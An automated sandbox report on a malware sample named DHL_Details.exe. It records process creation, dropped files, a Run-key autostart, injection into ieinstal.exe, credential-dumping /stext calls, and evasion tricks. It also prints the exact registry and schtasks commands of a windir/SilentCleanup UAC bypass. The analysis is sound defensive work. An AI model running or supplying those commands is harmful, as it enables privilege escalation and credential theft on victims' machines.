Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Xgku\Xgku.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknown | Process created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe'
Source: unknown | Process created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exe
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\cqdcbkuplxulphbpupahet'
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\mkjnccfrzfmqzvxtdzmihgnrtw'
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\pmofdvqknoedbblxukhcslhaucuaa'
Source: C:\Users\user\Desktop\DHL_Details.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\user\Desktop\DHL_Details.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\cqdcbkuplxulphbpupahet'
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\mkjnccfrzfmqzvxtdzmihgnrtw'
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\pmofdvqknoedbblxukhcslhaucuaa'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe'
Source: C:\Users\user\Xgku\Xgkuest.exe | Process created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exe
Source: C:\Users\user\Xgku\Xgkuees.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe'
Source: C:\Users\user\Xgku\Xgkuest.exe | Process created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exe
Source: C:\Users\user\Xgku\Xgkuees.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Executable creates window controls seldom found in malware
Source: C:\Users\user\Desktop\DHL_Details.exe | Window found: window name: TMainForm
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Submission file is bigger than most known malware samples
Source: DHL_Details.exe | Static file information: File size 1390594 > 1048576

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\DHL_Details.exe | Unpacked PE file: 0.2.DHL_Details.exe.10530000.7.unpack
Source: C:\Users\user\Xgku\Xgkuees.exe | Unpacked PE file: 11.2.Xgkuees.exe.10530000.5.unpack
Source: C:\Users\user\Xgku\Xgkuees.exe | Unpacked PE file: 15.2.Xgkuees.exe.10530000.5.unpack
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040F88B GdiplusStartup,LoadLibraryA,GetProcAddress,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,_itoa,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 12_2_0040F88B
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A9251 push 004551ECh; ret 0_3_023A92F1
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A9305 push 00455288h; ret 0_3_023A938D
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023683F5 push ecx; mov dword ptr [esp], edx 0_3_023683FA
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0237D0FD push 0042843Ch; ret 0_3_0237D141
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_02366151 push 004114BAh; ret 0_3_023661BF
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A91B9 push 00455125h; ret 0_3_023A922A
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0237C1A1 push 004274EEh; ret 0_3_0237C1F3
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0237C1FD push 00427528h; ret 0_3_0237C22D
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_02370671 push 0041BA0Fh; ret 0_3_02370714
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_02368651 push ecx; mov dword ptr [esp], edx 0_3_02368656
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0237C649 push 00427968h; ret 0_3_0237C66D
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A769D push 00452A06h; ret 0_3_023A770B
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A96DD push 0045565Dh; ret 0_3_023A9762
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_02368771 push ecx; mov dword ptr [esp], edx 0_3_02368776
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0235B75D push 00406AABh; ret 0_3_0235B7B0
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023687B5 push ecx; mov dword ptr [esp], edx 0_3_023687BA
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0237840D push 004237D0h; ret 0_3_023784D5
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A74BD push 004527E3h; ret 0_3_023A74E8
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A74F5 push 0045282Bh; ret 0_3_023A7530
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0235C50D push 00407842h; ret 0_3_0235C547
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A85A5 push 004538E3h; ret 0_3_023A85E8
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_023A7585 push 004528C4h; ret 0_3_023A75C9
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_0237AA85 push 00425DC7h; ret 0_3_0237AACC
Source: C:\Users\user\Desktop\DHL_Details.exe | Code function: 0_3_02366AF9 push 00411E39h; ret 0_3_02366B3E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_3_066E8568 push 9D9AEB5Ch; iretd 2_3_066E856D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_3_066E8514 push ds; ret 2_3_066E8523
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_00404C30 push 00404EDCh; ret 10_2_00404ED4
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_00404898 push 004048E9h; ret 10_2_004048E1
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_00408164 push 004082E0h; ret 10_2_004082D8
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_0040A5D9 pushad ; retf 10_2_0040A61D
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_00402E0C push eax; ret 10_2_00402E48

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Contains functionality to download and launch executables
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040D427 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 12_2_0040D427
Drops PE files
Source: C:\Users\user\Desktop\DHL_Details.exe | File created: C:\Users\user\Xgku\Xgkuees.exe
Source: C:\Users\user\Desktop\DHL_Details.exe | File created: C:\Users\user\Xgku\Xgkuest.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Contains functionality to start windows services
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 12_2_004111A9
Creates an autostart registry key
Source: C:\Users\user\Desktop\DHL_Details.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Xgku
Source: C:\Users\user\Desktop\DHL_Details.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Xgku

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 12_2_004099CD
Disables application error messages (SetErrorMode)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected Windows Security DisablerShow sources
Source: Yara matchFile source: 00000000.00000002.1152780364.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1153575673.0000000004251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1212711841.0000000004710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1185528886.0000000004238000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1152646901.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1212275886.00000000043A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1184301270.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Xgkuees.exe PID: 4204, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Xgkuees.exe PID: 4732, type: MEMORY
Source: Yara matchFile source: Process Memory Space: DHL_Details.exe PID: 5472, type: MEMORY
Source: Yara matchFile source: C:\Users\Public\Yako.bat, type: DROPPED
Source: Yara matchFile source: 15.2.Xgkuees.exe.4710000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.DHL_Details.exe.2b50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 11.2.Xgkuees.exe.2920000.3.raw.unpack, type: UNPACKEDPE
Contains functionality to enumerate running servicesShow sources
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Window / User API: threadDelayed 3254
Found evaded block containing many API calls
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Evaded block: after key decision graph_12-15058
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | API coverage: 1.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4116 | Thread sleep count: 3254 > 30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4116 | Thread sleep time: -32540000s >= -30000s
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 3660 | Thread sleep time: -36000s >= -30000s
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4516 | Thread sleep count: 113 > 30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4516 | Thread sleep time: -113000s >= -30000s
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4836 | Thread sleep count: 139 > 30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4836 | Thread sleep time: -139000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Last function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040504A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040506Fh
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040504A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040506Fh
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_105369D8 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 105369FDh
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_105369D8 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 105369FDh
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_00404268 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10536462 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10544061 FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10534CA3 FindFirstFileW
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10538D9D getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10541E6E FindFirstFileW
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10538B11 getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10535FD6 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread
Contains functionality to query local drives
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW9r
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Xgkuees.exe, 0000000F.00000002.1207823247.00000000007AC000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW(q
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit points
Source: C:\Users\user\Xgku\Xgkuest.exe | API call chain: ExitProcess graph end node graph_10-3859
Queries a list of all running processes
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_105310CE mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_105310CE mov eax, dword ptr fs:[00000030h]
Enables debug privileges
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3160000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3170000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3180000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3190000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31E0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31F0000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2570000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2800000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2810000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2820000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2830000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2840000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2850000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2860000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2870000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2880000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2890000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2A10000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AA0000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AB0000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AC0000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AD0000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AE0000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AF0000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B00000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B10000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B20000 protect: page execute and read and write
Source: C:\Users\user\Xgku\Xgkuees.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B30000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 12_2_0040F13D _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\DHL_Details.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 30D0000
